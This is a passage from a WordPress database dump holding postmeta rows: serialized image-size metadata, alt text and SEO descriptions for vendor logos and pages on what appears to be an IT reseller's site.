mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"Winrar-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"Winrar-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"Winrar-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"Winrar-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"Winrar-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2022,1845,'_wp_attached_file','2018/12/Zoom-Logo.png'),(2023,1845,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:21:\"2018/12/Zoom-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Zoom-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Zoom-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"Zoom-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"Zoom-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"Zoom-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"Zoom-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"Zoom-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"Zoom-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2024,1818,'_wp_attachment_image_alt','Cambium Logo'),(2026,1357,'_thumbnail_id','1818'),(2027,1357,'_yoast_wpseo_content_score','60'),(2035,1813,'_wp_attachment_image_alt','AnyDesk Logo'),(2036,1328,'_thumbnail_id','3228'),(2037,1328,'_yoast_wpseo_metadesc','Remote Desktop Application'),(2039,1814,'_wp_attachment_image_alt','Apple Logo'),(2040,1333,'_thumbnail_id','1814'),(2041,1333,'_yoast_wpseo_metadesc','iPad Pro, MacBook Pro, iMac Pro'),(2042,1333,'_yoast_wpseo_content_score','60'),(2045,1815,'_wp_attachment_image_alt','Aruba'),(2046,1335,'_thumbnail_id','1815'),(2047,1335,'_yoast_wpseo_metadesc','Enterprise Wireless LAN Solutions'),(2049,1816,'_wp_attachment_image_alt','Asus Logo'),(2050,1341,'_thumbnail_id','1816'),(2051,1341,'_yoast_wpseo_metadesc','Notebooks, Desktop and Monitors'),(2052,1341,'_yoast_wpseo_content_score','30'),(2055,1855,'_wp_attached_file','2018/12/meetings_2.jpg'),(2056,1855,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:893;s:6:\"height\";i:1135;s:4:\"file\";s:22:\"2018/12/meetings_2.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"meetings_2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"meetings_2-236x300.jpg\";s:5:\"width\";i:236;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"meetings_2-768x976.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:976;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"meetings_2-806x1024.jpg\";s:5:\"width\";i:806;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"meetings_2-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"meetings_2-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"meetings_2-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"meetings_2-16x20.jpg\";s:5:\"width\";i:16;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2057,1856,'_wp_attached_file','2018/12/meetings_3.png'),(2058,1856,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:839;s:6:\"height\";i:1163;s:4:\"file\";s:22:\"2018/12/meetings_3.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"meetings_3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"meetings_3-216x300.png\";s:5:\"width\";i:216;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"meetings_3-768x1065.png\";s:5:\"width\";i:768;s:6:\"height\";i:1065;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"meetings_3-739x1024.png\";s:5:\"width\";i:739;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"meetings_3-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"meetings_3-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"meetings_3-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"meetings_3-14x20.png\";s:5:\"width\";i:14;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2059,1857,'_wp_attached_file','2018/12/meetings_4.jpg'),(2060,1857,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:840;s:6:\"height\";i:578;s:4:\"file\";s:22:\"2018/12/meetings_4.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"meetings_4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"meetings_4-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"meetings_4-768x528.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:528;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"meetings_4-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"meetings_4-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"meetings_4-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"meetings_4-20x14.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:14;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2061,1858,'_wp_attached_file','2018/12/meetings_5.png'),(2062,1858,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:906;s:6:\"height\";i:1131;s:4:\"file\";s:22:\"2018/12/meetings_5.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"meetings_5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"meetings_5-240x300.png\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"meetings_5-768x959.png\";s:5:\"width\";i:768;s:6:\"height\";i:959;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"meetings_5-820x1024.png\";s:5:\"width\";i:820;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"meetings_5-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"meetings_5-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"meetings_5-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"meetings_5-16x20.png\";s:5:\"width\";i:16;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2063,1817,'_wp_attachment_image_alt','BenQ Logo'),(2064,1349,'_thumbnail_id','3226'),(2065,1349,'_yoast_wpseo_metadesc','Interactive Flat Panels (IFP), Monitors and Projectors'),(2066,1819,'_wp_attachment_image_alt','Canon Logo'),(2067,1361,'_thumbnail_id','1819'),(2068,1361,'_yoast_wpseo_content_score','60'),(2086,1481,'_yoast_wpseo_content_score','60'),(2087,1822,'_wp_attachment_image_alt','DocuSign Logo'),(2071,1366,'_yoast_wpseo_metadesc','Graphic Design Software, Illustration Software & Technical Software'),(2072,1366,'_yoast_wpseo_content_score','60'),(2073,1472,'_yoast_wpseo_content_score','30'),(2074,1472,'_yoast_wpseo_focuskw','CorelDRAW'),(2075,1472,'_yoast_wpseo_linkdex','60'),(2076,1821,'_wp_attachment_image_alt','D-Link Logo'),(2077,1371,'_thumbnail_id','1821'),(2078,1371,'_yoast_wpseo_content_score','60'),(2082,1873,'_wp_attached_file','2018/12/CorelDraw-Logo-1.png'),(2083,1873,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:28:\"2018/12/CorelDraw-Logo-1.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"CorelDraw-Logo-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"CorelDraw-Logo-1-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"CorelDraw-Logo-1-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"CorelDraw-Logo-1-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"CorelDraw-Logo-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"CorelDraw-Logo-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:28:\"CorelDraw-Logo-1-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2084,1873,'_wp_attachment_image_alt','CorelDraw Logo'),(2085,1366,'_thumbnail_id','3229'),(2108,1828,'_wp_attachment_image_alt','HPE Logo'),(2109,1387,'_thumbnail_id','1828'),(2110,1387,'_yoast_wpseo_metadesc','Servers and Systems, Networking and Data Storage'),(2111,1387,'_yoast_wpseo_content_score','90'),(2112,1829,'_wp_attachment_image_alt','Huawei Logo'),(2113,1388,'_thumbnail_id','1829'),(2114,1388,'_yoast_wpseo_content_score','60'),(2115,1830,'_wp_attachment_image_alt','IBM Logo'),(2116,1389,'_thumbnail_id','1830'),(2117,1389,'_yoast_wpseo_content_score','60'),(2118,1831,'_wp_attachment_image_alt','LG Logo'),(2119,1399,'_thumbnail_id','3237'),(2120,1399,'_yoast_wpseo_metadesc','Widescreen, 4K and Curved Monitors'),(2121,1399,'_yoast_wpseo_content_score','60'),(2122,1891,'_wp_attached_file','2018/12/download.png'),(2123,1891,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:72;s:4:\"file\";s:20:\"2018/12/download.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"download-150x72.png\";s:5:\"width\";i:150;s:6:\"height\";i:72;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"download-300x36.png\";s:5:\"width\";i:300;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:19:\"download-300x72.png\";s:5:\"width\";i:300;s:6:\"height\";i:72;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:19:\"download-480x72.png\";s:5:\"width\";i:480;s:6:\"height\";i:72;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:17:\"download-20x2.png\";s:5:\"width\";i:20;s:6:\"height\";i:2;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2124,1832,'_wp_attachment_image_alt','MapInfo Logo'),(2125,1402,'_thumbnail_id','1832'),(2126,1402,'_yoast_wpseo_metadesc','Desktop GIS, GIS Mapping'),(2127,1402,'_yoast_wpseo_content_score','60'),(2128,1473,'_yoast_wpseo_focuskw','Dropbox'),(2129,1473,'_yoast_wpseo_linkdex','74'),(2130,1833,'_wp_attachment_image_alt','Motorola Logo'),(2131,1405,'_thumbnail_id','1833'),(2132,1405,'_yoast_wpseo_metadesc','Portable Headsets'),(2133,1405,'_yoast_wpseo_content_score','30'),(2134,1834,'_wp_attachment_image_alt','Nitro Logo'),(2135,1410,'_thumbnail_id','3238'),(2136,1410,'_yoast_wpseo_metadesc','Create, edit, sign, and secure Portable Document Format (PDF) files and digital documents'),(2137,1410,'_yoast_wpseo_content_score','90'),(2138,1484,'_yoast_wpseo_content_score','60'),(2139,1835,'_wp_attachment_image_alt','Nutanix Logo'),(2140,1413,'_thumbnail_id','1835'),(2141,1413,'_yoast_wpseo_metadesc','Hyperconverged Infrastructure, Private Cloud Infrastructure'),(2142,1413,'_yoast_wpseo_content_score','60'),(2143,1836,'_wp_attachment_image_alt','Panasonic Logo'),(2144,1417,'_thumbnail_id','1836'),(2145,1417,'_yoast_wpseo_metadesc','Office and Communication Solutions, Professional Camera, Visual System, Air Conditioning Systems'),(2146,1417,'_yoast_wpseo_content_score','60'),(2147,1484,'_yoast_wpseo_focuskw','Faronics'),(2148,1484,'_yoast_wpseo_linkdex','55'),(2149,1837,'_wp_attachment_image_alt','Qnap Logo'),(2150,1427,'_thumbnail_id','3225'),(2151,1427,'_yoast_wpseo_metadesc','Network Attached Storage (NAS)'),(2152,1427,'_yoast_wpseo_content_score','60'),(2153,1555,'_yoast_wpseo_content_score','60'),(2154,1838,'_wp_attachment_image_alt','Sage Logo'),(2155,1431,'_thumbnail_id','1838'),(2156,1431,'_yoast_wpseo_metadesc','Business Cloud, Accounting Solutions, Business Management Solution, HR & Payroll Software'),(2157,1431,'_yoast_wpseo_content_score','60'),(2158,1555,'_yoast_wpseo_metadesc','Nuance document imaging solutions keep your organization\'s most vital information private.'),(2159,1839,'_wp_attachment_image_alt','SolarWinds Logo'),(2160,1441,'_yoast_wpseo_metadesc','Network Management, System Management, Database Management, IT Security, IT Help Desk'),(2161,1441,'_yoast_wpseo_content_score','60'),(2162,1555,'_yoast_wpseo_focuskw','NUANCE'),(2163,1555,'_yoast_wpseo_linkdex','68'),(2164,1840,'_wp_attachment_image_alt','Sophos Logo'),(2165,1457,'_thumbnail_id','1840'),(2166,1457,'_yoast_wpseo_metadesc','Next-Generation Firewall, Next-Generation Endpoint'),(2167,1457,'_yoast_wpseo_content_score','60'),(2168,1441,'_thumbnail_id','3235'),(2169,1841,'_wp_attachment_image_alt','Ubiquiti Logo'),(2170,1491,'_thumbnail_id','1841'),(2171,1491,'_yoast_wpseo_metadesc','Wireless Router, Router, Wireless Access Point, Switch'),(2172,1491,'_yoast_wpseo_content_score','60'),(2173,1568,'_yoast_wpseo_content_score','30'),(2174,1842,'_wp_attachment_image_alt','WatchGuard Logo'),(2175,1499,'_thumbnail_id','1842'),(2176,1499,'_yoast_wpseo_content_score','60'),(2177,1843,'_wp_attachment_image_alt','WD Logo'),(2178,1501,'_thumbnail_id','1843'),(2179,1501,'_yoast_wpseo_content_score','60'),(2180,1925,'_wp_attached_file','2018/12/Research-getting-published_370px-x-300px.png'),(2181,1925,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:370;s:6:\"height\";i:300;s:4:\"file\";s:52:\"2018/12/Research-getting-published_370px-x-300px.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:52:\"Research-getting-published_370px-x-300px-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:52:\"Research-getting-published_370px-x-300px-300x243.png\";s:5:\"width\";i:300;s:6:\"height\";i:243;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:52:\"Research-getting-published_370px-x-300px-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:52:\"Research-getting-published_370px-x-300px-370x300.png\";s:5:\"width\";i:370;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:50:\"Research-getting-published_370px-x-300px-20x16.png\";s:5:\"width\";i:20;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2182,1927,'_wp_attached_file','2018/12/PhD-research_370px-x-300px.png'),(2183,1927,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:370;s:6:\"height\";i:300;s:4:\"file\";s:38:\"2018/12/PhD-research_370px-x-300px.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"PhD-research_370px-x-300px-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"PhD-research_370px-x-300px-300x243.png\";s:5:\"width\";i:300;s:6:\"height\";i:243;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:38:\"PhD-research_370px-x-300px-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:38:\"PhD-research_370px-x-300px-370x300.png\";s:5:\"width\";i:370;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:36:\"PhD-research_370px-x-300px-20x16.png\";s:5:\"width\";i:20;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2184,1928,'_wp_attached_file','2018/12/Not-for-profit-support_370px-x-300px.png'),(2185,1928,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:370;s:6:\"height\";i:300;s:4:\"file\";s:48:\"2018/12/Not-for-profit-support_370px-x-300px.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Not-for-profit-support_370px-x-300px-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"Not-for-profit-support_370px-x-300px-300x243.png\";s:5:\"width\";i:300;s:6:\"height\";i:243;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:48:\"Not-for-profit-support_370px-x-300px-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:48:\"Not-for-profit-support_370px-x-300px-370x300.png\";s:5:\"width\";i:370;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:46:\"Not-for-profit-support_370px-x-300px-20x16.png\";s:5:\"width\";i:20;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2186,1929,'_wp_attached_file','2018/12/Public-health-studies_370px-x-300px.png'),(2187,1929,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:370;s:6:\"height\";i:300;s:4:\"file\";s:47:\"2018/12/Public-health-studies_370px-x-300px.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"Public-health-studies_370px-x-300px-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"Public-health-studies_370px-x-300px-300x243.png\";s:5:\"width\";i:300;s:6:\"height\";i:243;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:47:\"Public-health-studies_370px-x-300px-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:47:\"Public-health-studies_370px-x-300px-370x300.png\";s:5:\"width\";i:370;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s